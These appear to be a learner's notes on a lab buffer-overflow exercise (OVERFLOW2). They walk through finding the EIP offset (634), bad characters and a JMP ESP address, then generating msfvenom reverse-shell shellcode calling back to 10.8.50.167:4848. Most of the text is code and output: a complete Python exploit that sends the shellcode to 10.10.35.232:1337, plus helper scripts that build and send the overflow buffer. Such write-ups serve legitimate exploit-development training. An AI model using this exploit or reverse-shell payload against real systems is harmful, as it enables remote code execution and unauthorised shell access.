Buffer Overflow Prep 2

  1. Finding Bad Characters
  2. Find the jump point
  3. Generate the payload
  4. Exploit
  5. Conclusion

It’s the same thing as prep 1, but I’m still writing it because these are my notes.

It crashes at about 630 bytes; there is no point in being more precise than that at this stage.
If you send only “A” characters you cannot read the offset from EIP (it just shows 41414141); it needs a unique cyclic pattern, e.g. from:
https://wiremask.eu/tools/buffer-overflow-pattern-generator/

So it’s crashing between 600 and 700; let’s send a string of 300 “A” followed by 400 bytes of pattern.

EIP = 0x6c41316c, which the pattern tool locates at offset 334 in the pattern.

Offset 334 means 300 “A” + 334 bytes of pattern sit before EIP.
So the real offset is 300 + 334 = 634, and the next test string is “A”*634 + “B”*4.

View > Log (Alt+L)
!mona findmsp -distance 600

42424242 is my BBBB, so I have found EIP.
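The offset step above (pattern in, EIP value out, then add the filler) can be done without the web tool. This is an added example, not part of the original notes; it rebuilds the same Aa0Aa1… cyclic pattern that pattern_create.rb and the wiremask generator produce, and uses the page’s own values (300 “A”, a 400-byte pattern, EIP = 0x6c41316c) to show where the 334 and 634 come from.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1Aa2... used by pattern_create.rb and the
    wiremask generator. One full cycle is 26*26*10*3 = 20280 bytes, and every
    4-byte window inside it is unique, which is what makes the offset lookup work."""
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    if length > len(full):
        raise ValueError("pattern longer than one cycle is no longer unique")
    return full[:length].encode("latin-1")


def pattern_offset(eip_value, length=400):
    """Offset inside the pattern of the 4 bytes that landed in EIP, or -1.

    The debugger shows EIP as a 32-bit number; on x86 the stack is little-endian,
    so the bytes that were actually overwritten are struct.pack("<I", value)."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def total_offset(filler, eip_value, length=400):
    """Bytes sent before the pattern plus the offset found inside the pattern."""
    off = pattern_offset(eip_value, length)
    if off < 0:
        raise ValueError("EIP value not found in the pattern; wrong length or not a clean overwrite")
    return filler + off


if __name__ == "__main__":
    # Values from the page: 300 "A" + 400-byte pattern, EIP read as 0x6c41316c
    print(pattern_offset(0x6c41316c))       # 334  (bytes "l1Al" in memory)
    print(total_offset(300, 0x6c41316c))    # 634  -> "A"*634 + "B"*4 for the check
```

If `pattern_offset` returns -1, the pattern was shorter than the overwrite or EIP was not cleanly overwritten; lengthen the pattern rather than guessing.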

Finding Bad Characters

For mona (this writes bytearray.bin into the mona working folder, which compare uses below):

!mona bytearray -b "\x00"

The same bytes for my payload (\x00 is left out from the start, since it terminates C strings and is assumed bad):

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Restart the program, then:

nc 10.10.35.232 1337 <<< "OVERFLOW2 "$(python -c 'print( "A"*634 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')

!mona compare -f C:\mona\oscp\bytearray.bin -a esp

I got it, it’s because I’m using bash and not Python, so maybe there is an encoding problem.

import socket

ip = "10.10.35.232"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  # latin-1 maps every \xNN in the string to exactly one byte on the wire
  s.sendall(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except socket.error as e:
  print("Could not connect: %s" % e)
finally:
  s.close()

Bad chars found: \x00\x23\x3c\x83\xba

!mona bytearray -b "\x00\x23\x3c\x83\xba"

I modify my payload to remove the bad chars.
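What the two mona commands do, and why the bash one-liner gave garbage, as an added example that is not part of the original notes. `bytearray_without` is the equivalent of `!mona bytearray -b`, `compare` mimics `!mona compare` against the bytes found at ESP, and `fake_target` is a constructed stand-in for the vulnerable service (it mangles 0x23 and truncates at 0x3c) so the script runs offline; the real bad chars are whatever the real target reports.

```python
def bytearray_without(bad):
    """All byte values 0x00..0xff minus the ones already known to be bad,
    in the same order `!mona bytearray -b "..."` writes bytearray.bin."""
    return bytes(b for b in range(256) if b not in set(bad))


def compare(sent, observed):
    """Mimic `!mona compare -f bytearray.bin -a esp`: walk the bytes that were
    sent next to the bytes found at ESP and return the sent value at the start
    of each corrupted run, plus the byte at which memory was cut off.

    Only the first byte of a differing run is trustworthy: a bad character
    often mangles or truncates everything after it. Exclude what this reports,
    regenerate, resend and compare again until memory matches exactly."""
    bad = []
    i = 0
    while i < len(sent):
        if i >= len(observed):
            bad.append(sent[i])          # buffer was truncated here
            break
        if sent[i] != observed[i]:
            bad.append(sent[i])
            while i < len(sent) and i < len(observed) and sent[i] != observed[i]:
                i += 1                   # skip the rest of the corrupted run
            continue
        i += 1
    return bad


def wire_length(payload, encoding):
    """Number of bytes that actually leave the socket for a str payload."""
    return len(payload.encode(encoding))


def fake_target(data):
    """Constructed target for the demo: turns 0x23 into 0x20 and stops copying
    at the first 0x3c. Not the behaviour of any real service."""
    cut = data.find(b"\x3c")
    kept = data if cut < 0 else data[:cut]
    return kept.replace(b"\x23", b"\x20")


if __name__ == "__main__":
    round1 = bytearray_without(b"\x00")
    found = compare(round1, fake_target(round1))
    print([hex(b) for b in found])                      # ['0x23', '0x3c']
    round2 = bytearray_without(b"\x00" + bytes(found))
    print(compare(round2, fake_target(round2)))         # [] -> clean, stop here
    # Why the bash one-liner broke: under a UTF-8 locale print() writes every
    # character >= 0x80 as two bytes, shifting the rest of the buffer; latin-1
    # keeps one byte per \xNN, which is why the Python script uses it.
    chars = "".join(chr(b) for b in round1)
    print(wire_length(chars, "utf-8"), wire_length(chars, "latin-1"))   # 383 255
```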

Find the jump point

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

So 0x625011af, written little-endian, is \xaf\x11\x50\x62 (none of these bytes is a bad char; -cpb already filtered the candidates).
It will be our jmp: we place it in EIP instead of the BBBB.

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16

Generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c

Output:

"\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4";

Exploit

import socket

ip = "10.10.35.232"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16

payload=("\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4")

postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  # latin-1 keeps one byte per \xNN so the shellcode reaches the target unmodified
  s.sendall(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except socket.error as e:
  print("Could not connect: %s" % e)
finally:
  s.close()

Indeed, it’s better when I use the right tools.

Conclusion

    1. Find where it’s crashing (approximately).
    2. Send fewer “A” than the crash point followed by a cyclic pattern (here 300 “A” + 400 bytes of pattern) and read the pattern offset from EIP.
    3. Add BBBB at the computed offset to be sure it lands in EIP.
    4. Generate the bytearray with mona and send the same bytes after BBBB with the Python script (not with bash: print() re-encodes bytes above 0x7f).
    5. Compare against memory with mona to find the bad chars, one round at a time.
    6. Find the jump (JMP ESP) address with mona, excluding the bad chars.
    7. Create the payload with msfvenom without the bad chars.
    8. Put the jmp address (little-endian) in EIP, then the NOPs, then the payload.
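Steps 6 to 8 above, and the “Find the jump point” section, rely on two things going right before anything is sent: the address must be packed little-endian, and neither it nor the shellcode may contain a bad char. The Python 3 script below is an added example (not the page’s or TryHackMe’s own script) that builds the final buffer as bytes and refuses to send it when a bad char slipped in. It uses the page’s prefix, offset, JMP ESP address and bad chars; the shellcode is a constructed stand-in (eight int3 bytes, so a debugger on the target breaks when the sled is reached) where the msfvenom output would be pasted.

```python
import socket
import struct
import sys

BAD_CHARS = b"\x00\x23\x3c\x83\xba"   # from the mona compare rounds on the page


def p32(addr):
    """Pack a 32-bit address little-endian, the way it must sit on an x86 stack."""
    return struct.pack("<I", addr)


def check_bad_chars(data, bad=BAD_CHARS):
    """Bad characters present in data, sorted (empty bytes when clean).
    Run it on the return address AND on the shellcode before sending."""
    return bytes(sorted(set(data) & set(bad)))


def build_buffer(prefix, offset, ret_addr, shellcode, nops=16, bad=BAD_CHARS):
    """prefix | "A"*offset | ret | NOP sled | shellcode | CRLF, as bytes.

    Raises ValueError when the return address, the shellcode or the NOP byte
    itself contains a bad character for this target."""
    ret = p32(ret_addr)
    parts = (("return address", ret), ("shellcode", shellcode), ("nop", b"\x90"))
    for name, part in parts:
        found = check_bad_chars(part, bad)
        if found:
            raise ValueError("%s contains bad chars: %s" % (name, found.hex()))
    return prefix + b"A" * offset + ret + b"\x90" * nops + shellcode + b"\r\n"


def eip_slice(buf, prefix, offset):
    """The 4 bytes that overwrite EIP, to sanity-check the layout before firing."""
    start = len(prefix) + offset
    return buf[start:start + 4]


def send_buffer(ip, port, buf, timeout=5):
    """Deliver the whole buffer in one go; returns True once it has been sent."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(buf)
    return True


if __name__ == "__main__":
    prefix = b"OVERFLOW2 "
    shellcode = b"\xcc" * 8          # constructed stand-in for the msfvenom output
    buf = build_buffer(prefix, 634, 0x625011af, shellcode)
    print("%d bytes, EIP <- %s" % (len(buf), eip_slice(buf, prefix, 634).hex()))
    if "--send" in sys.argv:         # only touch the network when asked to
        send_buffer("10.10.35.232", 1337, buf)
```

Run it without arguments to see the length and the bytes that land in EIP (af115062); add `--send` to fire it at the target.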